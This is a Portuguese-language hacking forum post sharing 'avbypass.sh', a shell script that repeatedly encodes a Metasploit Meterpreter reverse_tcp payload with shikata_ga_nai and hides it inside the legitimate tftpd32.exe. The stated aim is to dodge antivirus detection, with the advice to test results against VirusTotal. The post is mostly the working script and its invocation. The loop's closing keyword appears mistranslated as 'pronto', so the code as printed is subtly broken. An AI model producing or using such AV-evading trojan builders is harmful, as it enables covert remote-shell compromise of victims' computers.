Results 1 to 1 of 1

Thread: Script 4 AV bypass meterpreters

  1. #1
    Moderator firebits's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    353

    Lightbulb Script 4 AV bypass meterpreters

    avbypass.sh


    Cria uma série de arquivos para ignorar um Antivirus.A maioria dos Antivirus encontram um trojan no arquivo do meterpreter. avbypass.sh é um script simples que usa outro .exe para esconder o trojan no arquivo sendo codificado x-vezes. É interessante, por exemplo, você codificá-lo duas vezes e enviar ao site VirusTotal - Free Online Virus and Malware Scan reportando se 5/41 scanners encontraram um trojan, você codificá-lo então em 3 vezes e virustotal.com irá reportar entre 7/41 scanners encontrando o trojam. Portanto, este script cria um "x" número de arquivos que você pode conferir Jotti's malware scan (19 AV scanners) ou VirusTotal - Free Online Virus and Malware Scan (41 AV scanners).


    Use o script em

    #sh avbypass.sh 10.0.0.1 2222 4 /root/testfile

    Code:
    #!/bin/sh
    # (C)opyright 2010 - pigtail23
    # AVbypass Creator v. 1.0 (2010-06-06)
    #msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x -->>> /pentest/windows-binaries/tools/tftpd32.exe <<<-- -t exe > $4$c.exe
    #/pentest/windows-binaries/tools/tftpd32.exe <--- you can use a file of your choise

    echo "sh avbypass.sh <IP> <Port> <Number of times to encode> <Filename>"

    if [[ $1 ]]; then echo "IP:" $1 ; else echo "IP not set"; exit 0; fi
    if [[ $2 ]]; then echo "Port:" $2 ; else echo "Port not set"; exit 0; fi
    if [[ $3 ]]; then echo "Number:" $3 ; else echo "Set Number"; exit 0; fi
    if [[ $4 ]]; then echo "Filename:" $4 ; else echo "Set Filename"; exit 0; fi
    echo "File/-s creating. Pls Wait..."

    for (( c=1; c<=$3; c++ ))
    do

    msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x /pentest/windows-binaries/tools/tftpd32.exe -t exe > $4$c.exe

    echo "File" $4$c".exe was created."

    pronto

    Espero que este script ajudá-lo a verificar e criar seus arquivos mais rápido.


    pigtail23

    fonte: http://www.backtrack-linux.org/forum...erpreters.html
    Tradução e Adaptação firebits
    Last edited by firebits; 06-08-2010 at 07:10 PM.

Similar Threads

  1. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  2. Script 4 AV bypass meterpreters
    By pigtail23 in forum BackTrack Howtos
    Replies: 10
    Last Post: 09-18-2010, 01:03 AM
  3. Bypass web logon pages
    By pigtail in forum Beginners Forum
    Replies: 5
    Last Post: 05-13-2010, 05:31 AM
  4. Bypass safe mode
    By xpleet in forum OLD Pentesting
    Replies: 8
    Last Post: 05-01-2009, 08:35 PM
  5. proxy bypass java?
    By cerebus in forum OLD Newbie Area
    Replies: 2
    Last Post: 11-14-2008, 12:30 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •